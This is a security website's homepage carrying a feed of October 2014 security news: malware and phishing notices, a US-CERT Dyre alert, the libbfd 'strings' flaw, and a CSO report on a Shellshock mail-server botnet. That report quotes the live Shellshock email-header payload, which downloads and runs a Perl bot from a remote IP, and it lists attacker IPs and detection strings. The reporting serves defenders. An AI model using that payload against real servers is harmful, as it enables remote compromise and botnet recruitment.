Welcome to Process-info.org library

Process-info.org is an online library of computer operating system processes that helps you identify processes running in the background of your operating system or on remote computers on your network.

Process-info.org contains a growing database of executable processes (mostly with the .EXE extension) and DLL libraries. You can search for processes through the search box or navigate alphabetically by the starting letter of the process name.

It is assumed that users are familiar with the computer operating system they're using and agree with suggested changes. Process-info.org will not be held responsible if changes you make cause a system failure.

The Latest News

15 latest global news related to computer security

October 29, 2014 3:08:53 AM CET

Rootkit:W32/ZAccess – Rootkit:W32/ZAccess constantly displays advertisements on the infected machine and may silently contact remote servers to retrieve additional advertising information.

 

October 29, 2014 3:08:53 AM CET

Trojan-Spy:W32/FinSpy.A – Trojan-Spy:W32/FinSpy.A is a component of a commercial surveillance product that monitors user activity.

 

October 28, 2014 2:40:00 AM CET

PHISHING SCAM - 'Request to Terminate Microsoft Account' – Email purporting to be from Microsoft Account Services claims that you have submitted a request to terminate your Microsoft Account and the process has already started. The email includes a link to cancel the termination request.

 

October 27, 2014 8:35:17 PM CET

VU#121036: BMC Track-It! contains multiple vulnerabilities – BMC Track-It! version 11.3.0.355 contains multiple vulnerabilities

 

October 27, 2014 5:47:19 PM CET

Pony stealer spread vicious malware using email campaign – Most people want to stay on top of their bills, and not pay them late. But recently, unexpected emails claiming an overdue invoice have been showing up in people’s inboxes, causing anxiety and ultimately a malware attack. Read this report from the Avast Virus Lab, so as a consumer you’ll know what to look for, […]

 

October 27, 2014 5:22:00 PM CET

An Easy Way to Dramatically Improve iPhone (or Any Phone) Security – This past weekend, as I stood in line at a Whole Foods market in Portland, Maine, waiting to buy delicious Maine beer, I did something kind of sketchy. I'm not proud of it.

The woman in front of me was watching the clerk tally her purchases. As she pulled her iPhone from her pocket to check Twitter or fire off a quick text, I took a glance at the device to see what model iPhone it was -- I can't help it, I shamelessly check out other people's phones, so what?

It all happened fast, and I happened to notice the four-digit code she entered to unlock it. I didn't mean to; I was just looking at the phone. (It was a gold iPhone 5s, and the passcode was 2727, if you must know.)

I wasn't even trying to see it. Imagine how easy it would be for a potential thief on the train, or standing in line at a Whole Foods -- hey, it could happen -- to watch her enter her code, grab the phone and run off to his subterranean lair or wherever people who steal phones go to wind down after a lengthy day of larceny.

I probably wouldn't have written this post if Whole Foods Lady had just used Touch ID and her fingerprint to unlock her device. So, lesson one: If you have an iPhone with Touch ID, use it. It works really well, and it helps protect your passcode from prying eyes.

The real point of this post: Don't use "simple" passcodes to protect your smartphone, whether it's an iPhone, Android, BlackBerry, Palm Pre, whatever. You should use an actual password and not a four-digit code. It's much more difficult to see and remember a password than a short code, especially if the password is a random set of letters and numbers. (Of course, experts suggest Really Bad Guys can use brute force attacks to crack iPhones' four-digit codes and longer passwords, but why make it easier on them?)

It's unrealistic to expect the average Jill iPhone to use a lengthy, random password, because they are hard to remember and even harder to type on touch screen keyboards. It's easy enough, however, to use a word that's meaningful, and memorable, to you and then throw your lucky number at the end. And if you use a fingerprint reader, you'll rarely have to enter the password anyway.

Today's smartphone owners store more and more sensitive information on their phones, and while the four-digit code is certainly better than no passcode at all, it really doesn't cut it these days. A fingerprint-based access system such as Apple's Touch ID or the Samsung Finger Scanner, secured with a password and not a passcode, is a much more suitable option for security-minded users.

To disable the iPhone's "simple passcode" option and enter in a new password, tap your iPhone's Settings icon, choose Touch ID and Passcode, and enter in your current passcode if you're using one. Next, turn the Simple Passcode option off, and then enter your new password, confirm it, and you're good to go.

It's also a good idea to keep an eye out for sketchy weirdoes with their hands full of beer bottles, peeking at your phone while you wait in line at the supermarket to pay for organic produce.

AS

 

October 27, 2014 5:10:20 PM CET

TA14-300A: Phishing Campaign Linked with “Dyre” Banking Malware – Original release date: October 27, 2014

Systems Affected

Microsoft Windows

Overview

Since mid-October 2014, a phishing campaign has targeted a wide variety of recipients while employing the Dyre/Dyreza banking malware. Elements of this phishing campaign vary from target to target including senders, attachments, exploits, themes, and payload(s).[1][2] Although this campaign uses various tactics, the actor’s intent is to entice recipients into opening attachments and downloading malware.

Description

The Dyre banking malware specifically targets sensitive user account credentials. The malware has the ability to capture user login information and send the captured data to malicious actors.[3] Phishing emails used in this campaign often contain a weaponized PDF attachment which attempts to exploit vulnerabilities found in unpatched versions of Adobe Reader.[4][5] After successful exploitation, a user's system will download Dyre banking malware. All of the major anti-virus vendors have successfully detected this malware prior to the release of this alert.[6]

Please note, the below listing of indicators does not represent all characteristics and indicators for this campaign.

Phishing Email Characteristics:

Subject: "Unpaid invoic" (Spelling errors in the subject line are a characteristic of this campaign)
Attachment: Invoice621785.pdf

System Level Indicators (upon successful exploitation):

Copies itself under C:\Windows\[RandomName].exe
Created a Service named "Google Update Service" by setting the following registry keys:
HKLM\SYSTEM\CurrentControlSet\Services\googleupdate\ImagePath: "C:\WINDOWS\pfdOSwYjERDHrdV.exe"
HKLM\SYSTEM\CurrentControlSet\Services\googleupdate\DisplayName: "Google Update Service"

Impact

A system infected with Dyre banking malware will attempt to harvest credentials for online services, including banking services.

Solution

Users and administrators are recommended to take the following preventive measures to protect their computer networks from phishing campaigns:

Do not follow unsolicited web links in email. Refer to the Security Tip Avoiding Social Engineering and Phishing Attacks [7] for more information on social engineering attacks.
Use caution when opening email attachments. For information on safely handling email attachments, see Recognizing and Avoiding Email Scams.[8]
Follow safe practices when browsing the web. See Good Security Habits [9] and Safeguarding Your Data [10] for additional details.
Maintain up-to-date anti-virus software.
Keep your operating system and software up-to-date with the latest patches.

US-CERT collects phishing email messages and website locations so that we can help people avoid becoming victims of phishing scams.

You can report phishing to us by sending email to phishing-report@us-cert.gov.

References

[1] MITRE Summary of CVE-2013-2729, accessed October 16, 2014
[2] MITRE Summary of CVE-2010-0188, accessed October 16, 2014
[3] New Banking Malware Dyreza, accessed October 16, 2014
[4] Adobe Security Updates Addressing CVE-2013-2729, accessed October 16, 2014
[5] Adobe Security Updates Addressing CVE-2010-0188, accessed October 16, 2014
[6] VirusTotal Analysis, accessed October 16, 2014
[7] US-CERT Security Tip (ST04-014) Avoiding Social Engineering and Phishing Attacks
[8] US-CERT Recognizing and Avoiding Email Scams
[9] US-CERT Security Tip (ST04-003) Good Security Habits
[10] US-CERT Security Tip (ST06-008) Safeguarding Your Data

Revision History

October 27, 2014: Initial Release

This product is provided subject to this Notification and this Privacy & Use policy.

 

October 27, 2014 4:24:00 PM CET

Vulnerability in widely used 'strings' utility could spell trouble for malware analysts – One of the first things a malware analyst does when encountering a suspicious executable file is to extract the text strings found inside it, because they can provide immediate clues about its purpose. This operation has long been considered safe, but it can actually lead to a system compromise, a security researcher found.

String extraction is typically done using a Linux command-line tool called strings that's part of GNU Binutils, a collection of tools for binary file analysis and manipulation available by default in most Linux distributions.

Google security engineer Michal Zalewski was recently running a type of vulnerability testing known as fuzzing against a library called libbfd (the Binary File Descriptor library) that sits at the core of GNU Binutils and is used for file format parsing. Fuzzing is the act of providing unexpected input to an application like libbfd in order to trigger potentially exploitable behavior.

What Zalewski found was, in his own words, "a range of troubling and likely exploitable out-of-bounds crashes due to very limited range checking." These are the kinds of errors that can lead to arbitrary code execution.

"Many shell users, and certainly most of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet," Zalewski said in a blog post in which he documents one such vulnerability. "Their understanding is that the tool simply scans the file for runs of printable characters and dumps them to stdout -- something that is very unlikely to put you at any risk."

According to Zalewski, that's not the case because the strings utility relies on libbfd to optimize the analysis process for supported executable formats. This means an attacker could create a binary file that exploits vulnerabilities in libbfd when analyzed by the strings utility in order to execute arbitrary code on the underlying system.

The problem is made worse by the fact that many Linux distributions ship the strings utility without address space layout randomization (ASLR), a protection mechanism that makes exploiting vulnerabilities harder. This makes potential attacks "easier and more reliable -- a situation reminiscent of one of the recent bugs in bash," Zalewski said.

The impact is not limited to strings. Other GNU Binutils components like objdump and readelf, or even custom tools that leverage libbfd are likely susceptible to similar attacks.

Executing strings against a binary file downloaded from the Internet is not something a regular user would normally do -- at least not without being socially engineered by the attacker. However, the risk is much higher for people whose job it is to analyze hostile files every single day.

"The bottom line is that if you are used to running strings on random files, or depend on any libbfd-based tools for forensic purposes, you should probably change your habits," Zalewski said. "For strings specifically, invoking it with the -a parameter seems to inhibit the use of libbfd. Distro vendors may want to consider making the -a mode default, too."

It's true that most malware researchers and computer forensics specialists analyze suspicious files in controlled environments, on systems specifically set up for this purpose. However, they are also known to make the occasional exception when they need a quick result, especially with such seemingly safe operations as string extraction.

"I'm sure many of us are guilty of running 'strings' on an untrusted file at one point or another outside of our test systems, so this does serve as a reminder that nothing is safe and vulnerabilities can be found in any code," said Carsten Eiram, the chief research officer at vulnerability intelligence firm Risk Based Security, via email.

A compromise is not desirable even when it involves just a dedicated system used for analysis.

"A researcher wouldn't want that system to be probed from the outside," said Bogdan Botezatu, a senior e-threat analyst at antivirus vendor Bitdefender, via email. "An attacker could gain intelligence about the network topology, the tools running on the respective computer or even deny service on that machine. It's mostly intelligence harvesting rather than compromising the organization, but it's still a threat that should be taken into account."

The risk posed by libbfd vulnerabilities also extends beyond the security industry.

"There are various tools that use libbfd, including some debug utilities that extract relevant data from crash dumps," Botezatu said. "They all depend on libbfd, whether these tools are used for forensics or debugging."

Exploitation is also not limited to cases where strings is used manually. There are also automated tools that leverage libbfd-related utilities to analyze samples submitted by other internal systems or directly by users from the Internet.

 

October 27, 2014 4:03:17 PM CET

VU#577193: POODLE vulnerability in SSL 3.0 – Many modern TLS clients can fall back to version 3.0 of the SSL protocol, which is vulnerable to a padding-oracle attack when Cipher-block chaining (CBC) mode is used. This is commonly referred to as the "POODLE" (Padding Oracle On Downgraded Legacy Encryption) attack.

 

October 27, 2014 3:09:00 PM CET

Report: Criminals use Shellshock against mail servers to build botnet – Targeting message transfer agents (MTAs), and mail delivery agents (MDAs), criminals are using Shellshock as a means to create botnets. The process is slow, but working, thanks to unpatched installations of Bash or certain implementations of it.

When it was disclosed in September, Shellshock -- the common name given to a vulnerability in Bash that enables command execution -- impacted systems both large and small, creating ripples across the tech industry.

Vendors struggled to release and maintain patches. For several days after the initial disclosure, researchers found ways to bypass the fixes, leading to the publication of four additional CVE advisories related to the main flaw.

It didn't take long, days in fact, before criminals latched on to the issue. On September 27, researchers at FireEye released details on a number of proof-of-concept scripts related to Shellshock.

"We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it's only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise," FireEye wrote at the time.

How right they were. Among the findings from FireEye was a proof-of-concept script that created an IRC-based (Internet Relay Chat) botnet, capable of sending spam, initiating a DDoS attack, or performing remote command execution on the compromised host.

On Friday, CSO became aware of a Shellshock-based campaign targeting organizations in Europe and the United States. It spreads via email, using Shellshock exploitation code in the message header fields. If successful, it delivers a simple Perl script as the payload, which adds the host to a botnet commanded from IRC.

Subsequent investigation by CSO led to the discovery of one of the IRC servers used to host the bots. Connected to this server were more than 160 compromised hosts as of October 24.

THE MESSAGE:

The Shellshock campaign targets mail servers, searching for vulnerable MTAs / MDAs. The messages themselves are blank, but the code needed to exploit the Shellshock vulnerability is placed into the message's headers.

The person(s) behind the spam blasts are including the following code in several message fields, including the "To:" field, "From:" field, "Subject" field, "Date:" field, "Message ID:" and others.

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

A full list of the fields, with examples, are available here.

A sample of one of the email messages - complete with headers - is available here, thanks to Benjamin Sonntag, the co-founder of citizen advocacy group La Quadrature du Net.

THE SERVER:

The IRC server identified by CSO is just one of several. It's installed on a previously compromised Web server that exists on the OVH network, and is maintained by a French IT firm focusing on network integration and information security.

While conducting research for this story, the person controlling the bots discovered us, and promptly issued a KLine, banning us from the server.

Given that the IRCd (IRC Daemon) exists on the compromised host and is accessed via Telnet (port 23), it's unlikely the firm is aware of the status of their server. CSO has contacted the IT firm, their web host, and OVH to report the matter.

NOTE:

By the time this story went to press, none of those contacted had responded to the issue. The IRCd was off limits to us, but responded to pings. The domain serving the malicious payload was still active.

There is evidence of a second server, existing on a network in Germany, which hosted more than 600 bots earlier this month. The connection between this earlier server and the recently discovered server in France is the IRCd, network naming conventions, and the fact that the same people managed both (based on login details).

The following IP addresses have been linked to incidents leveraging Shellshock as an attack vector.

62.193.210.216
178.254.31.165
190.94.251.41
87.118.84.123

These addresses either hosted a malicious IRC network, or were used to deliver malicious payloads. In the attack examples seen by CSO, the host was called by IP directly over HTTP (port 80) via cURL. If a domain is used to resolve the host's IP, the attackers tend to use free services, such as rima.tde.net.

In addition to checking the server logs for the aforementioned IP addresses, administrators should also check to see if any unknown scripts are running on the server. The bots in this campaign are all managed by a Perl script, which will contain strings in its code that are easily found in a grep of the /tmp directory:

Legend Bot [2011]
Legend IRC [2010]
legend.rocks
@admins=("god","ARZ","Zax");
"Installing Mocks please wait"

THE SCRIPT

The script that powers the botnet behind this recent campaign is called Legend, and it has existed for several years now. The Legend script is simplistic, but effective once installed on a system. It isn't designed to be clandestine, so it's often discovered during a scan of running processes, TMP directories, or network traffic.

With Legend, a compromised host can be called upon to do a number of things, including open a reverse shell, send spam, initiate a DDoS attack, scan a network with NMAP, or conduct basic Denial of Service via HTTP, TCP, UDP, or SQL. The script can also reveal sensitive information about the host, or turn it into a proxy.

Once installed, Legend will connect the compromised host to a pre-configured IRC server, where the attacker can issue commands individually or as a group. CSO has seen evidence of two Legend scripts circulating online. The source code for the first script, seen in late September and early October, is available here. The second, more recent script can be viewed here.

It's also worth noting that in separate, but related attacks, a second botnet script has been identified. The script, called "JST Perl IrcBot" in the headers, has many of the same functions as Legend. It was suggested as a possible payload when someone on Reddit identified the same campaign that CSO was investigating.

Mitigation:

The following MTAs / MDAs are directly impacted by Shellshock in some cases, depending on their configuration. The source link will open links to additional sources of information.

Courier Mail Server [Source]
Exim [Source]
QMail [Source] [Source]
Postfix [Source] / Procmail [Source]

There is at least one Shellshock exploit for Postfix circulating online, triggering the same attack as observed in this article. The Procmail source link points to an additional possible attack vector.

Sendmail [Source]

Depending on how it is configured, Sendmail is vulnerable. This is especially true for web scripts that call Sendmail. One example of such a script is sendmail-wrapper, which logs and throttles email sent by PHP. It was patched against Shellshock shortly after it was disclosed.

Above all else, the most important mitigation step is patching Bash to ensure that systems are updated with the latest version. All major vendors and Linux distributions have released patches against Shellshock, including Red Hat, IBM, Juniper, Cisco, Debian, Ubuntu, VMware, McAfee, and HP.

 

October 27, 2014 3:01:00 PM CET

Planning for a security emergency from the Tabletop down – Tabletop exercises enable organizations to analyze potential emergency situations in an informal environment, and are designed to foster constructive discussions among participants as they examine existing operational plans and determine where they can make improvements.

Such exercises seem like a natural for information and physical security, because they provide a forum for planning, preparation and coordination of resources during any kind of attack.

"Tabletop testing generally takes the form of a discussion-based exercise, and involves reviewing roles, responsibilities and response efforts required to respond to a given security incident," says Jay McLaughlin, CSO and senior vice president at Q2, a provider of software for the financial services industry.

"Testing tends to provide a high-level estimate of the potential for success in the event of such an incident," McLaughlin says. "The major benefit of using these types of exercises is that they provide real scenarios in a non-threatening, non-disruptive format--and can be rather economical to conduct. The goal [is] that participants and management become more aware of possible gaps or weaknesses that may exist in the incident response plan."

But what are the best practices for using security tabletop exercises? We asked some security executives to weigh in on the topic and here are a few of their suggestions.

Take the time to prepare for the exercise. "Preparation is a critical key to success in these exercises," McLaughlin says. "During the planning phase, the objectives, scope, and participants must be determined."

This is often the most time-consuming phase of planning for the exercise itself, but will ensure that the exercise is valuable, McLaughlin says. "When conducting the exercise, it is important that the facilitator enforces boundaries and helps guide the conversation, to prevent the group from going down the proverbial rabbit hole, which can often derail the exercise," he says.

Conversations should be focused on the efforts required for detection, containment, eradication and recovery from an incident, McLaughlin says. Following the exercise, a post-incident summary of the activities should be documented and reviewed, he says. This review should capture lessons learned, as well as what could be done to improve the overall response efforts of future incidents.

Involve multiple parties from throughout the organization. Develop a list of business function leaders from across different areas of the company that will be part of the table exercises team in addition to those from security.

"A tabletop exercise allows you to not only test your incident response capability, but it gives you the opportunity to coordinate across various teams including human resources, communications, legal, compliance, IT, physical security, etc.," says Mary Chaney, senior team leader, Incident Response & Data Management, at GE Capital Americas, a financial services unit of General Electronic Co.

"The problem that we as security professionals face is the lack of visibility until something bad happens," Chaney says. "A tabletop exercise gives you the ability to reach out in a non stressful environment to ensure the relevant parties are engaged timely and appropriately. Most importantly, [other] business leaders actually know your name and that you are there to help."

Involving business leaders in tabletop exercises "also gives senior leadership comfort in knowing that we are doing something to test our response and communications capability," Chaney says. It's a good idea to draft a report of the findings "and share it with all relevant stakeholders," she says. "Seek assistance with addressing gaps in the process and take the time to solidify who actually has decision making ability, before the crisis happens."

Having others from outside security sitting in on a drill can provide "a level of awareness as to why [information security] imposes controls that prior to the drill may have been viewed as excessive," says Mark Olson, director of information security at Iron Mountain, a provider of storage and information management services.

"By running a drill that follows an attack from drive by to a simple compromise of a desktop followed by a sideways attack on a server, [security] starts to make sense," Olson says. "Suddenly, the [information security] approach and program philosophy are no longer a 'sky is falling' theory but has a tangible risk reduction purpose. The tabletop exercise is the opportunity to demonstrate the purpose and value of our InfoSec program."

Make sure the participants know the ground rules of the exercise. "Communicate what is in scope for the exercise and out of scope," says Elayne Starkey, CSO for the State of Delaware.

"Participants get frustrated if the ground rules aren't explained or provided to them before the exercise," Starkey says. "Frustration can lead to those individuals having a negative experience during the exercise, and could result in them not getting a lot of value from the exercise."

Participants could then decide that exercises are a "waste of time" and not volunteer to participate in others, Starkey says. "In our exercises, each participant receives a copy of the official ground rules," she says.

Ensure that the participants know how to communicate during the exercise. "For example, are they to simulate communications or should they actually communicate their decisions to other individuals that are participating?" Starkey says.

Leverage resources from within your industry and the government. Some industry organizations provide services to help companies conduct tabletop exercises.

For example, the Financial Services--Information Sharing and Analysis Center (FS-ISAC) is a financial services industry forum for collaboration on critical security threats facing the global financial services sector.

GE Capital Americas belongs to FS-ISAC, Chaney says. "They have several different types of tabletop exercises that are facilitated by them, which cover various types of scenarios," she says. "The exercises are designed to test internal and external response capabilities."

In a recent exercise with FS-ISAC, GE Capital tested communications inside its environment and determined at what point an event rises to the level where the company should communicate with other FS-ISAC members.

It's also a good idea to invite outside agencies from federal, state and local government to participate. There are two reasons to do this, says Robert Connors, director of preparedness, Wounded Warrior Project Partnership at Raytheon Co., a provider of electronics, defense, communications and other systems.

"First, to get to know them and for them to get to know your environment before a crisis occurs," Connors says. "Second, so they can learn from you and share best practices with you. It's a mutually beneficial partnership."

When exercising, broader can be better. When structuring a tabletop it's important to scope the breadth of the exercise, Olson says. "When running a drill from detection through customer and public disclosure, a wealth of knowledge of your program is presented," Olson says.

"In the InfoSec world we typically view drills as the opportunity to validate our processes and procedures," Olson says. "In a drill that runs through to handling the public disclosure you gain much more. It provides a view into the organization's understanding of information security. It gives insight into how effective your security awareness training program is."

Make the scenario as realistic as possible. "People tend to try to 'fight' the scenario," Starkey says. "If it is a realistic scenario or event that is simulated, the fighting doesn't occur. Invite subject matter experts to the planning team to accomplish this."

For example, a recent exercise in Delaware was a cyber attack on the power grid, "and we included a rep from our largest utility to help write the exercise injects," Starkey says.

 

October 27, 2014 8:29:46 AM CET

Fighting Cybercrime Across Borders: Why Law Enforcement Collaboration Matters – We’ve frequently talked about how important it is for law enforcement and security companies to work together to stop cybercrime. One particular reason to do so is because of the nature of cybercrime: simply put, it has no borders. Perhaps more than any other type of crime, cybercrime respects no borders. A cybercriminal in Russia […]

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

 

October 27, 2014 2:54:00 AM CET

Tor Project flags Russian 'exit node' server for delivering malware – The Tor Project has flagged a server in Russia after a security researcher found it slipped in malware when users were downloading files.

Tor is short for The Onion Router, which is software that offers users a greater degree of privacy when browsing the Internet by routing traffic through a network of worldwide servers. The system is widely used by people who want to conceal their real IP address and mask their web browsing.

The suspicious server was an "exit node" for Tor, which is the last server in the winding chain used to direct web browsing traffic to its destination.

Roger Dingledine, Tor Project's project leader and director, wrote the Russian server has been labeled a bad exit node, which should mean Tor clients will avoid using the server.

The Russian server was found by Josh Pitts, who does penetration testing and security assessments with Leviathan Security Group. He wrote he wanted to find out how common it was to find attackers modifying the binaries of legitimate code in order to deliver malware.

Binaries from large software companies have digital signatures that can be verified to make sure the code hasn't been modified. But Pitts wrote most code isn't signed, and even further, most don't employ TLS (Transport Layer Security) during downloading. TLS is the successor to SSL (Secure Sockets Layer), which encrypts connections between a client and a server.

He suspected attackers were "patching" binaries during man-in-the-middle attacks and took a look at more than 1,110 Tor exit nodes.

Pitts only found one Tor exit node that was patching binaries. The node would modify only uncompressed portable executables, he wrote.

"This does not mean that other nodes on the Tor network are not patching binaries; I may not have caught them, or they may be waiting to patch only a small set of binaries," he wrote.

The broad lesson for users is that they should be wary of downloading code that is not protected by SSL/TLS, even if the binary itself is digitally signed, Pitts wrote.

"All people, but especially those in countries hostile to 'Internet freedom,' as well as those using Tor anywhere, should be wary of downloading binaries hosted in the clear -- and all users should have a way of checking hashes and signatures out of band prior to executing the binary," he wrote.

Send news tips and comments to jeremy_kirk@idg.com. Follow me on Twitter: @jeremy_kirk

 

October 27, 2014 2:50:00 AM CET

HOAX - 'NASA Confirms 6 Days of Total Darkness' – A circulating report claims that NASA has confirmed that Earth will experience 6 days of total darkness between the 16th and the 22nd of December due to a solar storm.

 

October 27, 2014 2:09:00 AM CET

Skype 'Missed Messages' Pharmacy Spam – According to this email, which claims to be from Skype, you have missed messages waiting. The email invites you to click a link to view your messages.

 
 
 

Navigate through the library of processes alphabetically by first letter: